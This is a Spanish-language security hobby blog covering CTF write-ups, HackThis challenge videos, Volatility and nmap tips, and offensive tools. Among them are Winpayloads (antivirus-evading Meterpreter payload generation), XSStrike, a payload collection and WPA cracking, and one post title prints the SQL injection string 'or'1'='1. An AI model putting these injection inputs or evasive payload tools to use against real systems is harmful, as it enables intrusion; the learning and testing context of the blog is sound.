lunes, 14 de agosto de 2017

LOG2.- Ludismo y Pokemon

Aquí tenéis el segundo Log de mis vacaciones y de como está funcionando nuestros experimentos. Como parte de nuestro CyberPunk Summer nos pusimos como meta en la entrada de vacaciones trastear con emuladores, Python y la Pocket CHIP.


  • Siendo transparentes el script que os vamos ya estuvimos trabajando con el un poco antes de vacaciones. Como podréis ver en el siguiente tweet que compartí. 
    1. Pero ahora es cuando nos hemos parado a utilizarlo y a subirlo a nuestro GitHub para que todos los que tengáis una Pocket CHIP o un sistema de base Linux podáis utilizarlo. No es gran cosa y está en completo spagetti code pero es funcional y mola un rato. 
      1. Enlace al script: https://github.com/StateX/PokeMenu 
    2. Y hablando de Pokémon, una actualización de ultima hora que no he podido resistir a compartiros. Se trata de una ejecución arbitraria de código donde no solo se terminan el juego de Pokémon amarillo en 8 minutos si no que además les ha dado tiempo a incorporar cameos de otros videojuegos.
      1. Una pasada: http://tasvideos.org/5384S.html
  • Por otro lado el router que tenemos para trastear se nos ha quedado corto y lo único que nos queda por experimentar con es ver con que tipo de antena wifi "hecha en casa" conseguimos obtener mas potencia. 
    1. Aquí podréis ver parte de nuestras manualidades: https://www.instagram.com/p/BXvmXfdhsi0/?taken-by=realstatex
Como veis poco a poco vamos cumpliendo objetivos y también hemos grabado algún capitulo que otro de nuestra CyberPuk Summer el cual podréis ver en Setiembre. Así que de momento avanzamos mejor que la semana que viene y eso me gusta. 

Sed Buenos ;)

jueves, 10 de agosto de 2017

LOG1.- Tres días sin blog y dos de lluvia

Llevo tres días sin publicar una entrada y ya tengo el mono. tres días en los cuales, en uno, hemos desembarcado todo el equipo y en los otros dos nos ha llovido como si no hubiera un mañana. Así que aun no hemos podido ir de "aventuras" ni grabar nada. 


Pero bueno, como os prometí, este es nuestro primer log y si que hemos sido mas activos en las redes sociales, sobretodo por instagram y twitter. También hemos podido ir adelantando algunos temas.  
  1. Jugando con un pequeño router que nos encontramos "abandonado" y repasando diferentes ataques a WPS
    1. https://www.instagram.com/p/BXf8Z-hhrP1/?taken-by=realstatex
    2. Paper para entender los ataques a WPS: https://infostatex.blogspot.com.es/2016/08/paper-brute-forcing-wps.html
  2. Como ayer aun llovía no pude hacer nada mas que leer. Pero es lectura de la buena y relacionada con la seguridad informática:
    1. https://www.instagram.com/p/BXlJfQShZIC/?taken-by=realstatex
  3. Lo único que me reconcome un poco es no haber podido trastear tanto con la PocketCHIP como me gustaría debido a la lluvia y además El Kentaro esta publicando una serie de entradas relacionadas con este micro ordenador y el hacking de ondas. Una pasada y adamas deja todo código en bash que crea para que podamos aprender.  
    1. El Kentaro en Medium: https://medium.com/@elkentaro/hackerchip-v-1-part-1-of-n-59804d27c245
Yo sigo de vacaciones intentando disfrutar de mi tiempo libre pero con la cabeza en este blog, supongo que después de tantas publicaciones uno ya siente la necesidad de publicar aunque sea una noticia.  Pero como ya os comenté, es de esto mismo de lo que quiero "escapar".

Sed Buenos ;) 

lunes, 7 de agosto de 2017

Vacaciones.- CyberPunk Summer, Logs y Tonto

Ya os lo deje entrever en la entrada en la que os presentábamos la [CyberPunk Summer 2017] pero mejor que quede claro. Siempre por vacaciones hago algo especial y esta es la locura de este año.

A partir de hoy hasta el 11 de septiembre solo publicare entradas relacionadas con este evento que nos hemos inventado para poder trastear con toda la tecnología que tenemos. Esto quiere decir que solo subiremos entradas cuando tengamos algo que valor para enseñaros y que estaremos mas activos por las redes sociales ([Twitter], [Youtube] e [Instagram]). 

A todas estas entradas "Randoms" que vamos a realizar durante este mes las vamos a llamar LOGs con un propósito de que sepáis que estemos vivos y como forma de cambiar un poco este blog.  La verdad es que nos gustaría acercarnos un poco mas a los lectores y a la comunidad. No quiero acabar convirtiéndolo en un RSS de noticias que podéis encontrarlas en vuestro twitter. Que os tenemos olvidados. 

Eso si, después de vacaciones y durante, intentaremos grabarlo todo en vídeo y aprender a editar correctamente para, en un futuro, podamos proporcionaros vídeos mas interesantes. 

Por otro lado respecto a Tonto, tengo que reconocer que me he quedado bloqueado a la hora de hacer que Linux detecte mi micrófono o el del portatil, no hay manera.  Así que en estas vacaciones quiero ir haciendo pruebas y me comprometo a sacar una nueva versión de cara a finales de septiembre. Así me siento mejor conmigo mismo y compenso las pocas entradas.   

Dicho esto nos vemos por las redes sociales que antes os he comentado y espero que cuando veáis los proyectos aportéis vuestras ideas que se que se os da de maravilla. 

Sed Buenos ;) 



domingo, 6 de agosto de 2017

Mi hora de código 22 .- Java y Codeacademy

Ya sabéis que estamos de mudanzas de vacaciones y no tenemos mucho tiempo, pero eso no quiere decir que no tengamos tiempo para seguir aprendiendo y traeros el vídeo de cada domingo.

Hoy volvemos con una sección que teníamos tan olvidada como a Tonto pero que poco a poco la iremos retomando. Se trata de Mi hora de Código y ahora empezamos con Java. 


Sed Buenos ;)

viernes, 4 de agosto de 2017

Vídeo.- Ransomware historia de una molesta amenaza

Dentro del recordatorio de "conceptos básicos" que estamos haciendo los jueves con la Infografía, hoy vamos a darle un repaso al ya famoso Ransomware a través del bueno de [Josep Albors] donde explica claramente de donde proviene este malware y algunos ejemplos de como este tipo de bicho consiguió meterse hasta la cocina de sus clientes. Muy recomendable.


Sed Buenos ;)

jueves, 3 de agosto de 2017

Infografia.- Conceptos básicos sobre el Malware Parte 2

Es jueves y toca infografia. Bueno, seguimos con conceptos básicos respecto al Malware y nos es para menos ya que, frente un incidente, si detectamos bien el tipo de bicho que tenemos le solucionaremos un poco la faena al pobre de IT que te atienda. 


Sed Buenos ;) 

miércoles, 2 de agosto de 2017

Vídeo.- Cyber Grand Challenge: The Analysis

Vale, es cierto, hoy no sabia que subir y es que estoy preparando ya el equipaje para las vacaciones y cosas chulas para el [CyberPunk Summer 2017] que esperamos que os guste un montón. Pero navegando entre mis redes sociales me he encontrado con esta CTF. Bueno, llamarla solo CTF se queda corto, tenéis que verlo vosotros mismos.  ¡Hasta tienen árbitros!


A que tenéis ganas de estar allí trasteando con cada uno de esos equipos. Yo si. 

Sed Buenos ;) 

martes, 1 de agosto de 2017

Python.- Entendiendo if __name__ == "__main__"

Hace mucho que juego con Python y si algo caracteriza este lenguaje de programación es la sencillez pero siempre me a parecido un poco absurdo que lo primero que no encontremos al leer cualquier programa bien escrito, sea lo siguiente:  if __name__ == "__main__"

La verdad es que cuando entiendes para que sirve es muy útil, pero contrasta muy fuerte con lo sencillo que es empezar a programar en este lenguaje. Así que hoy os voy a recomendar el vídeo práctico que explica muy bien para que sirve. 


Sed Buenos ;) 

lunes, 31 de julio de 2017

Slide.- Trasteando con armas inteligentes

Este fin de semana ya se han visto la gran mayoría de slides de las Defcon 25 y todas son super interesantes pero si una ponencia va sobre jugar con armas inteligentes pues suma puntos. Pues aquí la slides de como trastear con una pistola inteligente. La cual, viene a juego con un reloj que al entrar en contacto con la arma esta puede ser disparada. 


Pues la gente de la Defcon no defrauda y han podido replicar la comunicación entre la pistola y el reloj. Un experimento muy chulo que merece la pena ser leído. 

Muchas gracias, 

Un saludo. 

domingo, 30 de julio de 2017

HackThis Crypto 6 .- Esteganografía a lo Mr Robot

Domingo, vídeo y tranquilidad. Aun que este reto si que ha sido complicado. Si os acordáis de la serie de Mr Robot, Elliot escondía la información en archivos de audio de diferentes grupos. En este reto deberemos descifrar la información escondida dentro de un audio gracias a un análisis previo de su espectro.

A sido muy chulo y muy divertido esperamos que también os guste. 


Sed Buenos ;)

viernes, 28 de julio de 2017

OSCP Music.- Defcon XX

Creo que hace mucho ya os hable del recopilatorio de "música" que se publico en la Defcon XX. Pero sea como sea, hace mucho tiempo que le había perdido la pista a este soundtrack en la cual hay temas que me parecen sublimes y como últimamente estoy recopilando música que me permita concentrarme para el OSCP, pues toca recomendarla. 

Mi favorita es ytcracker Hacker War a ver si os gusta a vosotros también: 


Sed Buenos ;)

jueves, 27 de julio de 2017

Infografia.- Conceptos básicos sobre el Malware

Como os prometí el anterior jueves,  vamos ha hacer un repaso por los conceptos mas básicos de este mundo que nos mola tanto, a base de infografias. Así que hoy toca hacer un repaso a los conceptos básicos sobre el malware en general.


Sed Buenos ;)

miércoles, 26 de julio de 2017

GitHub.- Aprendiendo RegEX

La verdad es que aunque hago un montón de scripts relacionados con expresiones regulares poco tiempo he dedicado a "estudiar" o aprender sobre ellas. Por eso y ya que estoy recopilando información para el [Cyberpunk Summer 2017], hoy os voy a recomendar un repositorio mas.


Zeeshan Ahmed deja muy claro desde el primer momento que son las RegEx en su GitHub:
Una expresión regular es un patrón que se compara con una cadena de texto de izquierda a derecha. La palabra "expresión regular" se puede encontrar generalmente en su término abreviado como "regex" o "regexp". La expresión regular se utiliza para reemplazar un texto dentro de una cadena, validar la forma, extraer una subcadena de una cadena basada en una coincidencia de patrón y mucho más.

Enlace al repositorio:

martes, 25 de julio de 2017

Aircrack-ng/Hashcat.- Crack WPA/WPA2 Wi-Fi

Ya es verano y se que muchos de vosotros os iréis de vacaciones a sitios donde los baudios están algo difuminados. Así, por si queréis aprender de ataques wireless intentando romper algún cifrado WPA o WPA2 de algún router que tengáis por casa. 


Este tutorial del repositorio ilustra cómo romper las redes Wi-Fi que están protegidas mediante contraseñas débiles. No es nada nuevo, pero es suficiente información para probar la seguridad de tu propia red, aprender y jugar con ello que es divertido. 

Enlace al repositorio con la guía, los comandos y todos los documentación:

Sed Buenos ;) 

lunes, 24 de julio de 2017

ReconDog.- Reconócelos a todos

Muchas veces en la fase de reconocimiento fallamos al no tener la suficiente información y al menos a mi, no se me ocurre consultar el whois. Pues con esta herramienta escrita en Python nos permite desde consultar el whois, realizar un escaneo de puertos o detectar si la maquina es un Honeypot. 


Aunque como critica si leéis el código de la herramienta esta muy desordenado y la verdad es que necesita un poco de limpieza. Es muy espagueti code. 
No obstante funciona bien y con algún ajuste por mi parte me servirá para no olvidarme nada y mas ahora que quiero lanzarme de cabeza al OSCP. 

Si me animo subo el fork al GitHub pero no prometo nada. Mientras tanto os dejo con la fuente de la herramienta donde encima nos ayudan a instalar la herramienta.  
Sed Buenos ;) 

domingo, 23 de julio de 2017

HackThis Crypto 5 .- Miscelanea Cifrada

Hoy domingo, toca vídeo y ya que en toda la rama de crypto hemos visto diferentes tipos de cifrado fáciles de "romper". Hoy a Kazukun le toca jugar con todos estos cifrados para obtener la pass al próximo reto de HackThis. 

Esperamos que os guste:


Sed Buenos ;)

viernes, 21 de julio de 2017

OSCP.- Posiblemente despues de vacaciones.

Este verano aparte de reto que nos hemos marcado en [publicar vídeos disfrutando] de la tecnología, también quiero empezar a mirarme la certificación OSCP (Offensive Security Certified Professional) la cual tiene fama de ser difícil. 

Así que me voy a equipar con los consejos de mi buen amigo Snifer en la cual nos recomienda casi todo lo que debemos leer y hasta de donde podemos sacar VMs para practicar: 
Un poco de motivación en forma de vídeo:



Y canciones para pasar las 24hs practicando como se debe: 

Si, esta no deja de ser otra entrada para mi yo de mediados de agosto, pero creo que a vosotros también os puede servir y es que si no lo hago así al final me va a pillar el toro. 

Sed Buenos ;)

jueves, 20 de julio de 2017

Infografía.- ¿Qué es un troyano?

Hoy es jueves y toca infografía y creo que todas esta imágenes os gustan mas si son para repasar algún tipo de malware o ataque conocido. Así que a partir de hoy todos los jueves intentaremos recomendaros una infografia que nos permita repasar estos conceptos aunque sean un poco antiguas.

Este es un claro ejemplo de infografia del 2011 que explica muy bien que es un troyano aunque la he tenido recortar un poco ya que había información muy erronea. 


Sed Buenos ;)

miércoles, 19 de julio de 2017

CYBERPUNK SUMMER 2017 (0).- The Pocket CHIP

Este año se nos ha juntado un montón de tecnología de que que queremos disfrutar este verano. Así que durante el mes de agosto realizaremos una serie de vídeos llamados CYBERPUNK SUMMER jugando, modificando y en fin, disfrutando con la tecnología que para algo la tenemos. Además de servirnos para mejorar la calidad de los vídeos del canal de youtube y de ser una especie de master en edición de vídeo que ya nos hace falta. 

Contenido de esta serie: 
  • The Pocket CHIP
  • Moding para Pocket CHIP (Carcasa 3D, leds, etc)
  • War Driving with airodump-ng
  • The Drone
  • Emuladores
  • Hacking variado e improvisado. 
Así que, os dejo con el vídeo numero 0 donde os presentamos la [Pocket CHIP] un micro pc de 69$*(mas gastos de envío y aduanas) que como vais a ver tiene sus pros y sus contras. 


Sed Buenos ;)

martes, 18 de julio de 2017

Vídeo.- pancake, radare & ARM

La ingeniería inversa es algo que se me atraganta mucho y si alguien tiene algún truco que me pueda ir bien para aprender os lo agradecería mucho. También quiero aprender como funciona radare así que en cuanto veo un vídeo de Sergi ‘pancake’ Alvarez no puedo evitar verlo y recomendaroslo aunque esta vez no lo podáis ver desde el blog. 


Sed Buenos ;)

lunes, 17 de julio de 2017

mini-tor.- TOR fácil y con solo a 20kb.

Ya sabéis mi tremenda devoción por el software minimalista y si ademas lo juntas con la red TOR, me sobra tiempo para compartirlo y pensar como crear el mio propio (En perfecto Python Of course). 


Como su nombre indica mini-tor, es una prueba de concepto que nos permite abrir cualquier contenido o web .oninon a través de la red tor con comando muy simple.
  • mini-tor.exe "webalaquequierasacceder" 

Fácil, cómodo y para toda la familia. Ademas es una idea muy chula pera "tunearla", os dejo el enlace al GitHub.
Sed Buenos ;) 

domingo, 16 de julio de 2017

HackThis Crypto 3 - -- --- .-. ... . .-.-.

Hoy es domingo y toca vídeo. Así que, seguimos con los retos de Criptografia y hoy toca morse. Muchos no sabemos ni escribir SOS pero Kazukun nos muestra como podemos descifrar código morse en pocos pasos y con esto resolver el tercer reto de criptografia de HackThis.

 

Sed Buenos ;)

viernes, 14 de julio de 2017

[Vídeo].- How Tor Users Got Caught

Mi devoción por la Defcon vino a raíz [que me tragué todo el documental] que sacaron los organizadores de este congreso por su 20ª edición. Por eso siempre voy rapiñado vídeos de aquí y allí. Así que hoy me encanta recomendaros una ponencia donde se exponen varios casos de usuarios de red tor que fueron y de porqué fueron pillados al hacer maldades. 


Sed Buenos ;)

jueves, 13 de julio de 2017

Infografia.- Así se propaga el Ransomware

Nunca está de mas repasar los métodos que tiene este malware de moda para propagarse y que podemos hacer nosotros para pararlo o al menos para estar alerta para no caer en sus redes. Pues que mejor manera de hacerlo que con una infografia. 


Sed Buenos ;)

miércoles, 12 de julio de 2017

Winpayloads .- Python y la generación de Payloads.

Esta vuelve a ser una entrada para mi yo de aquí unas semanas cuando esté de vacaciones y pueda jugar con tranquilidad con mi [Pocket C.H.I.P]  este gadget corre sobre un debian al que le puedes instalar casi de todo.  Así que y como me gusta la seguridad informática, ¿Por que no probar herramientas como Winpayloads?. 

Winpaylods es una herramienta que genera payloads que utiliza el  meterpreter shellcode de metasploits, inyecta la  ip y puerto de los usuarios en el shellcode y escribe el archivo python que ejecuta el shellcode usando ctypes. Esto se cifra (AES) y se compila a un ejecutable de Windows utilizando pyinstaller.

Pero aunque al principio estos payloads eran indetectables, ya han subido algunos a virustotal y a día de hoy solo los detectan 8 marcas de antivirus. (Enlace sacado de su GitHub)
Muy chulo verdad, pues con un USB conectado al bicho mola mucho mas. Aquí tenéis un vídeo que muestra como funciona: 


Enlace a la herramienta: 

Muchas gracias,

Un saludo.

martes, 11 de julio de 2017

Python.- Remove Exif Data

Ya sabéis que los metadatos es algo de lo que [hemos hablado largo y tendido] y la verdad es que nunca me canso.  Así que cuando veo herramientas relacionadas con Exif no puedo evitar compartirlas.  


Remove Exif Data With Ease es una herramienta escrita en Python 2.7 y pasada por el [Py2exe] para crear un ejecutable para Windows (vamos un .exe). La cual es capaz de eliminar todos los metadatos de todas las fotos que tengamos en una carpeta creando un duplicado sin esta información y dejando la original. 

Enlace al GitHub: 

Sed Buenos ;) 

lunes, 10 de julio de 2017

VimGameCodeBreak.- Borrando código con estilo.

Seguro que habéis programado algo y que os han entrado ese picorcillo al notar que vuestro código no funcionaba. La verdad es que si esto pasa con un editor de código "amigable" imaginaros si estáis usando vim por eso johngrib se lo ha tomado por el lado ZEN y ha creado una copia del videojuego de Arkanoid que se ejecuta como un plugin de vim y al impactar contra una linea de código, esta desaparece. 



Simplemente brutal y grande a la vez. Me ha encantado. Aquí tenéis el enlace a su repositorio: 
Muchas gracias, 

Un saludo 

sábado, 8 de julio de 2017

Hobbytrucos.- Volatility (I)

Lo prometido es deuda y como ayer no hice entrada la cambiamos por el parón de los sábados aunque esta este programada . Bueno,  prometí compartir mis hobbytrucos para la CTF que tenia hoy (aunque haya quedado último) pero creo que será esta información os gustará y me ayudará a mejora.


Trabajar con registros en Volatility: 

  • Para ver las hives cacheadas, grupos lógicos de keys, subkeys, y valores en el registro.
    •  volatility -f random.dmp --profile=profile hivelist
      • Con este comando podremos ver donde empieza y donde acaba cada hive
    •  volatility -f random.dmp --profile=profile printkey -o iniciodeloffset  -K 'rutaenlosregistros'
      • Con este comando podremos "navegar entre las key y las subkeys de una hive en busca de los valores que nos interesen. 
Extraer un dmp de un proceso que nos interese de una imagen raw con Volatility:

  • Primero deberíamos ver el arbol de procesos del raw por si hubiera alguno que nos interesara:
    • volatility -f random.raw pslist --profile=profile pstree
  • Una vez hemos encontrado el proceso que nos interesa nos quedamos con el Process identificator (PID) y usamos el siguiente comando para guardar un .dmp en /root/ para luego jugar con el: 
    • volatility -f random.raw --profile=profile memdump -p 4092 -D /root/
Sed Buenos ;) 

jueves, 6 de julio de 2017

Infografia.- WannaCry VS Petya

Después de unos cuantos días después del segundo "ciber-ataque mundial" mucho se ha hablado de los parecidos con WannaCry pero hay algunos mitos que debemos aclarar. Para eso esta inforgrafia tan chachi sobre las diferencias entre Petya y WannaCry. Muy recomendable. 


Sed Buenos ;)

miércoles, 5 de julio de 2017

CTF.- Algunos Write Ups curiosos sobre Forensics (II)

Si hace unos días os recomendé algunos Write Ups en forma de blogs hoy me gustaría centrarme en vídeos. La verdad es que me he podido apuntar pocos hobbytrucos  así que no se si os lo compartiré o no, dependerá de si me son útiles el viernes. Pero, espero que con estos vídeos me quede claro donde he de empezar a mirar y como. 

Para empezar, aquí tenéis un truco muy chulo con imágenes donde una de ellas está oculta y no vale solo con la parte técnica si no que encima tienes que saber de aeropuertos:


Otro que nos muestra como extraer un archivo .avi de un pcap en Wireshark debido a una llamada por VoIP:


Y el último un amplio y muy recomendable repaso a Volatility: 


Sed Buenos ;) 

martes, 4 de julio de 2017

Python Loves Pentesters

Arrodillaos ante el poder de Python y ante su sencillez.  El no os hará llorar y os facilitará vuestros pentests. Bueno,  broma aparte del momento evangelizador, hoy me he encontrado con un recopilatorio de herramientas y librerías en/para Python que no defrauda para nada, si que están las mas famosas pero al estar divididas por "áreas" han puesto algunas librerías y herramientas que yo no conocía.


Así que me lo guardo para trastear con ellas en un futuro. Aquí tenéis el link: 
Muchas gracias, 

Un saludo. 

lunes, 3 de julio de 2017

CTF.- Algunos Write Ups curiosos sobre Forensics (I)

Este viernes por la tarde me han convocado a una CTF orientada al campo Forense. Así que he decidido ir recopilando información y Hobbytrucos (los comparto después de la CTF si me dan buen resultado) para que al encontrarme con el reto, al menos las situaciones me suenen. 


El primer write up nos muestra como tenemos que trabajar si nos encontramos un .Pcap en el sistema: 

El segundo y el tercero nos muestran como trabajar con volatility y process dump para extraer una imagen del proceso de paint, curioso y la verdad es que no tenia ni idea: 
Y el cuarto, es un recopilación de entradas de los grandes de Security Art Work donde juntan estas técnicas y les dan tres vueltas para solucionar una CTF muy complicada. 
Sed Buenos ;) 

domingo, 2 de julio de 2017

HackThis Crypto 2 - Al Cesar lo que es del Cesar

Hoy es domingo y toca otro reto orientado a la criptografía, esta vez un poco mas complicado pero si investigamos bien veremos que el cifrado cesar puede ser fácilmente descifrable.

Más información sobre el cifrado Cesar:

Por eso Kazukun nos muestra como solucionar este reto y una herramienta que nos ayudara a saber el contenido de este mensaje cifrado.




Sed Buenos ;) 

viernes, 30 de junio de 2017

Vídeo.- Malware Analysis Petya

Ya han pasado unos cuatro días desde el susto de Petya y ya hay mucha información técnica hablando este Ransomware. Pero para mi uno de los puntos mas cojos es el análisis de malware pero lo voy entendiendo gracias a vídeos como el que os voy a recomendar hoy.

Si os quisierais poner a analizar Petya a alto nivel así tendríamos que empezar.


Sed Buenos ;)

jueves, 29 de junio de 2017

Hobbytruco.- Nmap y resolución inversa de DNS

La verdad es que a veces me dejo llevar por Python y mas desde hace unos días me entere que el videojuego [Eve online está programado en una versión tuneada de Python] llamada Stackless Python. Pero, es verdad que muchas veces me pongo a programar script sencillos para que hagan acciones que se podrían hacer con herramientas que tenemos al alcance y esto está muy bien para aprender pero también es una perdida de tiempo para vosotros y para mi. 


Por eso,  hoy a parte de compartir con vosotros un script para realizar la resolución inversa de DNS de una lista de ips, voy ha empezar con la seria Hobbytruco donde siempre que yo (o vosotros pero es mas para mi día a día) necesite algo pueda recurrir a este blog a encontrar el truco o la explicación correspondiente. 

Por cierto, aquí tenéis el enlace de mi POC para la resolución inversa donde se utiliza socket.gethostbyaddr(ip_address) de la librería socket para que nos devuelva el hostname: 

Muy chulo y didáctico pero esto mismo nos lo puede hacer nmap con un simple comando 
  • nmap -iL ips.txt -sL -oA archivoenelquequieresguardarlo

Donde las opciones son las siguientes: 
-iL <archivo>: Se pasan los objetivos en un fichero, cada uno en una línea
-sL: Es el encargardo de hacer la resolución inversa a las IPs del archivo.
-oA: Crea un fichero para los tipos de salida normal, XML y otro igual que la normal pero que a favorece al comando grep.

Sed Buenos ;)

miércoles, 28 de junio de 2017

Payloads All The Things

Hoy ha costado mucho encontrar algo curioso que publicar que no esté relacionado con [Petya] (El heredero de WannaCry) pero creo que el repositorio del estudiante de ingenieria [Swissky] que os voy a recomendar hoy, lo vale. 


Payloads All The Things como su nombre indica es una recopilación de payloads y bypasses para testear la seguridad de aplicaciones Web y la verdad es que es bastante completo. 

Para los que no sepáis que es un Payload os engancho una versión "tuneada"  de la wikipedia: 

Enlace al GitHub de Payloads All The Things: 
Sed Buenos con esto 0;) 

martes, 27 de junio de 2017

XSStrike.- Fuzz and Bruteforce

Python es amor, Python es alegría y como creyente radical de este lenguaje de programación que me he vuelto durante este último año, no puedo evitar sorprenderme al ver que cada día aparecen mas herramientas relacionadas con la seguridad informática. 

Hoy le toca el turno a XSStrike una herramienta que nos permite [Fuzzear] y hacer fuerza bruta de parámetros para encontrar vulnerabilidades XSS (cross site scripting) pero, antes de lanzar todo su arsenal, es capaz de detectar si hay un WAF (Web Application Firewall) y evitarlo. 


Ademas: mola un monto, tiene colores y es fácil de instalar gracias a la magia de pip install -r requirements.txt


Enlace a la GitHub de la herramienta: 
Fuente de la noticia y mucha mas información: 

lunes, 26 de junio de 2017

Vídeo.- mindreader Google CTF 2017

Siempre se aprende de ver a alguien solucionar una CTF, no tanto como jugando con ella pero si aun no nos atrevemos a entrar en el mundo de las CTFs o nos hemos atascado mucho y estamos hasta los mismísimos del [Try Harder]. 

Toda esta introducción viene a razón de que revisando la CTF de Google 2017 no tenia ni idea de porqué se utilizaba /dev/fd/ para poder acceder al archivo environ usando /dev/fd/../environ. [Ahora ya lo se], pero quiero recomendaros el vídeo de LiveOverflow del cual tengo que aprender un montón y ha hecho que me ponga a buscar muchas mas información. 


Sed Buenos ;) 

domingo, 25 de junio de 2017

HackThis Crypto 1 - Le juro agente que la pass estaba al revés

Domingo, sol, calor y vídeo. A Kazukun ya se le está quedando corto Hackthis y ya nos hemos acabado todos los retos de SQL. Así que, ahora toca darle fuerte a todos los de crypto aunque es bastante fácil. 

Ya veréis.


 Sed Buenos ;)

viernes, 23 de junio de 2017

Paper.- Tempest ataca de nuevo contra AES-256

Para los que no sepáis que es un ataque Tempest, es el espionaje de los sistemas de información a través de fugas de emanaciones, incluyendo señales, sonidos y vibraciones de radio o eléctricas.
 

Para mi, hace mucho que no oía hablar de los ataques Tempest y pensaba que era algo relegado al pasado pero veo que no, Ahora han vuelto y con mas fuerza y fastidiando al algoritmo AES-256.

Enlace al paper:
Sed Buenos ;) 

miércoles, 21 de junio de 2017

Slides.- ZAP vs BurpSuite

Siempre me he preguntado cuando valía la pena usar BurpSuite o ZAP ya que par mi eran herramientas muy parecidas. Hoy quiero que os quedéis con las Slides 9, 10 y 11 de la siguiente presentación y veréis que donde no llega una llega la otra. 


Así que esto me ha abierto un poco mi cabeza llena de serrín y ya que me voy a poner a repasar las diferencias entre BurpSuite y Zap quiero recomendaros dos guías del amigo Snifer donde nos muestra como utilizar debidamente estas herramientas. 


Sed Buenos ;) 

martes, 20 de junio de 2017

Vídeo.- Whatsapp y El abusón de las features

Ya he recomendado por aquí alguna charla de [Daniel Martinez] pero hoy me ha asustado y tengo algunas preguntas que espero que me respondáis en los comentarios. La charla que dio Daniel en la ROOTED CON 2016 sobre Whatsapp donde demostraba que las fotos y los vídeos que compartimos son subidos a sus servidores y se nos muestran a través de una URL. 


Una vez visto el vídeo, aquí ve mi pregunta. Entendiendo que el el cifrado End to End llego sobre el día 6 de Abril del año pasado y que la charla se dio en los días 3, 4 y 5 de Marzo de 2016  ¿Alguien sabe si ahora estas imágenes o vídeos van cifrados?  Entiendo que si, al igual que hará telegram. Pero si lo confirmáis me quedo mas tranquilo y reinstalo el Whatsapp. 

Sed Buenos ;) 

lunes, 19 de junio de 2017

Herramienta.- Pwnbox

Los [contenedores Docker] se han venido para quedarse y cada vez me sorprende mas sus  aplicaciones. Por ejemplo [Harold Rodriguez] lo ha aplicado a algo que nos gusta a todos que son las CTFs (Capture The Flag),


Pues Pwnbox es un contenedor Docker que contiene varias herramientas para el reversing de binarios y para su explotación.  Una pasada pero un poco difícil de instalar, aunque en el GitHub encontrareis como hacerlo paso por paso. 

Enlace a la herramienta: 


Sed Bueno ;)

domingo, 18 de junio de 2017

Vídeo.- HackThis SQL 2 - Query que te Query

Hoy es Domingo  por lo que toca vídeo y en este reto, si que Kazukun se ha tenido que estrujar la cabeza y aprender un poco de peticiones SQL antes de realizarlo. Pero, espero que aprendáis todos que, con un poco de estudio y de preparación se puede aprender y solucionar retos tan divertidos como este.


Sed Buenos ;)

viernes, 16 de junio de 2017

Vídeo.- Universal Radio Hacker

Ya sabéis que llevo tiempo mirando la mejor manera de introducirme en el mundo del Software Defined Radio (SDR) así que me he quedado a cuadros al ver la siguiente herramienta y de conocer que su creador [Johannes Pohl] sube vídeos a Youtube enseñando como usarlas. 

Os dejo con el vídeo que merece mucho la pena: 


Y aquí está el enlace a la herramienta, tendréis que pegaros un poco con las dependencias, pero vale la pena. 

Sed Buenos ;) 

jueves, 15 de junio de 2017

SSHCheck .- Revisa tus conexiones SSH

Muchas veces no conectamos por SSH a nuestros equipos sin revisar correctamente si la conexión es segura o no. Por eso hoy os recomiendo SSHCheck, una aplicación web donde podemos auditar cualquier IP o Hostname que nos sepamos sin necesidad de abrir nuestro Nesus, OpenVAS o Nexpose.


Ademas la info que da es bastante completa sobretodo a lo que cifrados algoritmos de cifrado. Lo mira todo (claro está que no se pondrá a comprobar contraseñas por defecto) . 

Enlace a la la herramienta: 
Sed Buenos ;) 

miércoles, 14 de junio de 2017

Vídeo.- Historias para no dormir

Hoy me he levantado con ganas de ver ponencias y me he acordad del bueno de Lorenzo Martinez.  Así que me he puesto a buscar ponencias y después de un tengui tengui falti tuneado a visto visto no visto,  he visto por twitter que habían publicado su charla en el Mundo Hacker Day 2017 así que me he puesto a verla. 

La verdad es que me esperaba una charla sobre forense sobre rusos, no se porque, pero me he encontrado con un muy buen repaso a APT famosas que han ido surgiendo en los últimos años. Muy recomendable. 


Sed Buenos ;) 

martes, 13 de junio de 2017

CheatSheet.- Data Science in Python

Bueno, cada día que pasa parece que este blog se encamina a ser unicamente de Python pero es que cada vez me sorprende mas este lenguaje de programación. Hoy, aunque no os recomendaría Python para esto, os recomiendo esta "chuleta" sobre PANDAS (No, los osos no ...) una librería construida sobre Numpy para la  estructura y el análisis de datos. 


Inforgrafia en grande y mucha mas información: 

Sed Buenos ;)

lunes, 12 de junio de 2017

Filtrar información desde los LEDs de tu router.

Esto me ha parecido un pasada. Ya no podemos fiarnos ni de los LEDs de nuestro router gracias al buen trabajo de la gente de Negev (Mordechai Guri, Boris Zadov, Andrey Daidakulov, Yuval Elovici). 

Estos señores se dedicaron a relacionar la información que pasa por un Switch o un router con los leds de estos dispositivos con el fin de grabar la secuencia con una cámara remota o con un sensor óptico. No será muy rápido, pero como mínimo es muy curioso y merece que os leáis el Paper.


Enlace al paper: 
Sed Buenos ;) 

domingo, 11 de junio de 2017

HackThis SQL 1 - 'or'1'='1

Hoy es domingo y toca vídeo de HackThis, aunque este reto ya salió en el apartado de basics de esta página de retos pero nunca está de mas recordar que 'or'1'='1 te pude abrir muchas puertas si el programador de turno no ha hecho bien su trabajo.

Sea como sea, hoy Kazukun nos muestra como pasarnos el primer reto del apartado SQL Injection de HackThis .



Sed Buenos ;)

viernes, 9 de junio de 2017

PDO.- Python + Have I been pwned?

Hace mucho que tenia esta idea en la mente. ¿Por qué no me creo un script en Python que consulte a [Have I Been Pwned] (la página esa para ver si tus pass han sido filtradas por algún lado) para que cada día revise si me han Pwneado?

Pues nada me puse a mirar la página y vi que el servicio de Notify me! en el que te avisan por correo si tu contraseña ha sido filtrada no me convencía, pero al ver el apartado API vino la luz de la inspiración.

Solo hace falta consultar la siguiente URL substituyendo {account} por la dirección de correo que queráis buscar y ya lo tenemos:
  • GET https://haveibeenpwned.com/api/v2/breachedaccount/{account} 
Por lo que lo tenia fácil para preparar mi script en python  así que para jugar primero cree a GAS. Un script que permite buscar cualquier cuenta y te devuelve la confirmación de que estás jodido y las fuentes donde los malos pueden encontrar tu pass. 

Ejemplo de GAS: 


Así que, una vez ya programado GAS lo modifique para crear a PDO (Powned Daemon Oriented) y esta ya podía consultar todas las cuentas de correo que le añada a un txt. Pues esto, fusionado con programarlo para que se ejecute cada vez que abro el equipo ya tengo lo que veníamos a buscar. 
 
Cada día al encender el PC el script monitorizará por mi si mis pass están al alcance de todo Internet y eso me tranquiliza un poco

